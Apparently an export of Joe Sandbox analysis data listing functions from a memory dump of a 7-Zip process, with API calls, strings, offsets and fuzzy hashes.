• Instruction ID: b156e25b553986cd9cc526d4d3a51f32f90505c656d2432a687d35a3243501ee
• Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
• Instruction Fuzzy Hash: FD814673305AC486CB10EF2AD8842AD77A1F795F98F494122DE6D0BB69CF39C886C351
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
                                                                                                                                                                                                                                • String ID: Q
                                                                                                                                                                                                                                • API String ID: 0-3463352047
                                                                                                                                                                                                                                • Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                • Instruction ID: c007c01a8b86c8ac2c882ef4332991b99d465072556fd525f3af781cb06b4eaa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82618272318A8482CB20DF25E48067EB7A1F7D4B94F559212EB9B57768DF78C845CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                                                • API String ID: 1294909896-454015223
                                                                                                                                                                                                                                • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                • Instruction ID: 93506525babe4a88b847c2da46c4ada4fdb68895259a503bbc854e35656657ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9251A565340A41A2DE28EB56EA513AC2372EBB97D0F849233EA1F07B59DF78C595C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E01D7
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001E02EA
                                                                                                                                                                                                                                  • Part of subcall function 001DFD30: _CxxThrowException.MSVCRT ref: 001DFE50
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001E031F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • There is no second file name for rename pair:, xrefs: 001E0302
                                                                                                                                                                                                                                • Empty file path, xrefs: 001E02CD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                                                • API String ID: 3129652135-1725603831
                                                                                                                                                                                                                                • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                • Instruction ID: 36f30711756e223f016bdcfd9adecf1c97d7ed96b9320c3b16b32a7b3f4bb7d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E41C272204AC5C5CA21DB1AE88479E6760F3A97B4F504312EFB9077D9DB78C5C6CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 555121230-0
                                                                                                                                                                                                                                • Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                • Instruction ID: 3374619f718c76ecb4efbfdfdaffe72d5776a3af73dc7dd86b948385f3d117e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC418D33300A8896C761DF26E8447B973A6F388B98F594135DF5A8BB25DF70C886C751
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: = $h<"
                                                                                                                                                                                                                                • API String ID: 1294909896-3841148799
                                                                                                                                                                                                                                • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                • Instruction ID: 22757411ef2aafb3ab6ae986d1c86614a698dc10e29cda6e75006a47de584feb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E319672225A8096CB10EF55E48039EB765F7F1764F944223FA9E43B68DBB8C985CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                • API String ID: 1294909896-1885708031
                                                                                                                                                                                                                                • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                • Instruction ID: 48c58931a47967ca12d92a011e6276732bd43997a1011c8ee3d586e9f7e63318
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D131A423224B9581CB20DE15A98046EA769F7E47E4F550522FFAF477A5CF35C891CB00
APIs
• WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3D18
• GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3D25
• _CxxThrowException.MSVCRT ref: 001D3D4E
• WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3DC1
• _CxxThrowException.MSVCRT ref: 001D3DFA
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ByteCharExceptionMultiThrowWide$ErrorLast
• String ID:
• API String ID: 2296236218-0
• Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
• Instruction ID: 4c6720d9f9389926c70a61909c06167dfc482020f421239b7d128966cb609d3f
• Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
• Instruction Fuzzy Hash: 23310673704BC59ACB20CF25E48435EBBA6F795B94F558022DF9963724DB38C981DB02
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
• Instruction ID: c5452d8138edb4d7ca86a9f1f7884ec408eec317bfe16f842e693c989d51b228
• Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
• Instruction Fuzzy Hash: 18215A67312B4086CB259F25D8503696370EBE5FA8F298222DF3D17798DF35C8528310
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: File$Create$CloseHandleTimefree
• String ID:
• API String ID: 234454789-0
• Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
• Instruction ID: a6863f7b7619450cebb0576519ff467f250d62448f11f1f453a2c86a268a484c
• Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
• Instruction Fuzzy Hash: 4F21C63230468096D660DF16FA54B5A6721F3957F8F544322EE79437E8CB39C98AD700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
• Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
• Instruction ID: 27f18c794e224f1e11b330946fd604de351f0141416eb4e8fdf397960b0b0d43
• Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
• Instruction Fuzzy Hash: DF11DFB6309749A1EF088F669E553F823619B55FC4F864420DF0A9B205EF78CE9AE341
APIs
  • Part of subcall function 001DB544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,001F82CA), ref: 001DB56F
  • Part of subcall function 001DB45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4AA
  • Part of subcall function 001DB45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4F8
• free.MSVCRT ref: 001F8343
  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
  • Part of subcall function 001D8624: free.MSVCRT ref: 001D86A9
• free.MSVCRT ref: 001F832B
• free.MSVCRT ref: 001F8336
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$QueryValue$Openmemmove
• String ID: 7z.dll$Software\7-zip
• API String ID: 2771487249-1558686312
• Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
• Instruction ID: 33934e4d25aaf1a2223d5fa92ef5feeb49ffd583e32c998baaab3e6b446c2b65
• Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
• Instruction Fuzzy Hash: 11115A6234494490CA20EB11E5553EEA725EBF5BE4FC45213EE6E47766DF3CC64AC700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$free
• String ID:
• API String ID: 3873070119-0
• Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
• Instruction ID: 71fb33c458eb6660e6868a6e3f137b3af3469ce5bb329d469f08e7219e2b6db6
• Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
• Instruction Fuzzy Hash: 4211217221498592DB20DF25E94475DA330F7A9B94F444222EFAD43BA4DF3CC955C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3252411863-0
                                                                                                                                                                                                                                • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                • Instruction ID: e6e60f67d528fe6e2701cd2de96be02079f266e191257cb031a6931b986e3fca
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B401A722304A00C1DA30DB61EA8437D5322ABD67F0F584322DEBD837A5DF2CC9468710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                • Instruction ID: 032f591cba0d2891e96640397fad74b8b097a854b7cb13b179d3c5ee6babe88f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF03A63266A0482CA06FE32E46522E5320A7E7F91F085463DF2E53352DF38D497C314
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                • Instruction ID: 25e64f17f17591b35c2844c286517c4b32dc38289a3b01ad6a65a3e892abc5ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AE0E26261040481CB14AF66DCA20282334ABB5F887189052DB3E8B325CE30E85283A4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 002125EC
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212636
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: Name$Size
                                                                                                                                                                                                                                • API String ID: 2276422817-481755742
                                                                                                                                                                                                                                • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                • Instruction ID: 5d5b5994709e1047dc8488f34d229f09f723fe05f4b86026ad05f835344ad3ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB41C572220685E1CB2ADF34E4947DE3760F764758FC45122EF6E42251DF78CAAAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BDCD
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BE0B
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                                                                                • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                                                • API String ID: 3543874852-1218467041
                                                                                                                                                                                                                                • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                • Instruction ID: f075a37f40432fe2762b271b2eb0a8c59e142a113fb471484de436b3d7b10fdc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5317072214A85A2DE79EF35E4853EEA360E774744F448022DBAF462A1DF7CD4CAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C4FD
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C50D
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021C553
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$freememset
• String ID: :
• API String ID: 2276422817-3653984579
APIs
• fputs.MSVCRT ref: 0021B8EB
• free.MSVCRT ref: 0021B90A
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
